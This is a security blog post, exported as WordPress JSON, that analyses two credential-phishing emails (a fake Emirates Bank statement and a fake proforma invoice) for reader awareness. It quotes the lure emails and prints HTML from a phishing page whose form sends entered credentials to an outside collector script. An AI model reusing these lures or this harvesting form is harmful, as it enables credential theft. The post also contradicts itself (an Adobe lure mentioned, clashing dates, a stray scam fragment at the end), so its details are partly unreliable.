{"id":12784,"date":"2022-07-12T16:14:59","date_gmt":"2022-07-12T16:14:59","guid":{"rendered":"https:\/\/myonlinesecurity.co.uk\/?p=12784"},"modified":"2023-04-01T06:34:02","modified_gmt":"2023-04-01T06:34:02","slug":"email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams","status":"publish","type":"page","link":"https:\/\/myonlinesecurity.co.uk\/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams\/","title":{"rendered":"Email Credential Phishing Via Fake Emirates Bank Statement And Fake Generic Proforma Invoice Scams"},"content":{"rendered":"
We see lots of phishing attempts for email credentials. This morning we are seeing a series of \u201cattacks\u201d using Adobe as the lure. So far I have seen 2 different ones.<\/p>\n
Remember, many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com >. That is why these scams and phishes work so well.<\/p>\n
The first email looks like:<\/p>\n
From:<\/strong> Emirates Bank Online Statement <no-reply-googleaccountupdate@emailmessagingservices.com.pl><\/p>\n
Date:<\/strong> Wed 27\/09\/2021 00:30<\/p>\n
Subject:<\/strong> Cash Statement<\/p>\n
Attachment<\/strong>: Cash Statement.pdf<\/p>\n
Dear Sir,<\/em><\/p>\n
Please kindly find attached bank statement debit notification and a copy of bank transferred receipt made in your favour today against your invoice.<\/em><\/p>\n
For your reference.<\/em><\/p>\n
Thank you.<\/em><\/p>\n
May M. Martinico<\/em><\/p>\n
<\/p>\n
This email has a genuine PDF attachment with a link to which will redirect you to . There is a warning on the bit.ly page that alerts you to it being a phishing or malware site, but it will still allow you to visit the page by clicking the link.<\/p>\n
The phishing page refuses to display in Internet Explorer, Firefox or Chrome (just displaying a plain white page). It uses data:text\/html;base64<\/p>\n
However, downloading the HTML file allows it to open on the computer, in Firefox only.<\/p>\n
The page looks like this<\/p>\n
where if you enter any details and press submit, you are redirected to where you see this fake statement<\/p>\n
<\/p>\n
The next phishing scam works right out of the box with no effort<\/p>\n
From:<\/strong> Chychou Ann <chychou@sce.pccu.edu.tw><\/p>\n
Date:<\/strong> Wed 27\/09\/2017 02:36<\/p>\n
Subject<\/strong>: Request For Proforma Invoice Urgent<\/p>\n
Attachment<\/strong>: Ugent New Order.pdf<\/p>\n
Hello!<\/em><\/p>\n
Nice to contact you again after a long time.<\/em> Find attach our Ugent purchase order.Are the prices<\/em> and send me proforma invoice with Bank account and payment terms.<\/em><\/p>\n
Best regard<\/em><\/p>\n
Chychou Ann<\/em><\/p>\n
<\/p>\n
This PDF attachment looks like<\/p>\n
Where if you follow the link you go to where you see<\/p>\n
<\/p>\n
Entering details tries to redirect you to , where I get a 404 page not found (a quick lookup shows the site was registered by GoDaddy in 2001, the DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null routed the DNS already)<\/p>\n
A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail, but I am not sure how successful that will be<\/p>\n
<form method=\u201dPOST\u201d action=\u201dhttp:\/\/alliancecr.com\/skd\/xendr.php\u201d \/><\/em><\/p>\n
<div style=\u201dposition: absolute; width: 313px; height: 20px; z-index: 1; left: 476px; top: 240px\u201d id=\u201dlayer3\u2033><\/em><\/p>\n
<input type=\u201dhidden\u201d name=\u201dcontinue\u201d id=\u201dcontinue\u201d<\/em><\/p>\n
value=\u201dhttp:\/\/mail.google.com\/mail\/\u201d \/><\/em><\/p>\n
<input type=\u201dhidden\u201d name=\u201dservice\u201d id=\u201dservice\u201d<\/em><\/p>\n
value=\u201dmail\u201d \/><\/em><\/p>\n
<input type=\u201dhidden\u201d id=\u201d_utf8\u2033 name=\u201d_utf8\u2033 value=\u201d☃\u201d\/><\/em><\/p>\n
<input type=\u201dhidden\u201d name=\u201dbgresponse\u201d id=\u201dbgresponse\u201d value=\u201djs_disabled\u201d><\/em><\/p>\n
<input type=\u201dhidden\u201d name=\u201dchallengestate\u201d id=\u201dchallengestate\u201d value=\u201dAO4Zohb47sJS-tYrNsz1ONocIO2jeysxuca-R6LmDH0cX6Sjqn8BGWloBrG1WmwW-4r7QsnjCVJZNloVJdjdxBh2Zmw4RaTFp8vb9O9bAnlffm-82_cInUo\u201d><\/em><\/p>\n
We all get very blas\u00e9 about phishing and think we know so much that we will never fall for a phishing attempt. Don\u2019t assume that all attempts are obvious. Watch for any site that invites you to enter ANY personal or financial information. It might be an email that says \u201cyou have won a prize\u201d or \u201csign up to this website for discounts, prizes and special offers\u201d<\/p>\n
Body Content:<\/strong><\/h3>\n
\nDo you still remember me am?<\/em><\/p>\n
\nstill the same like before? Pls confirm to us<\/em><\/p>\n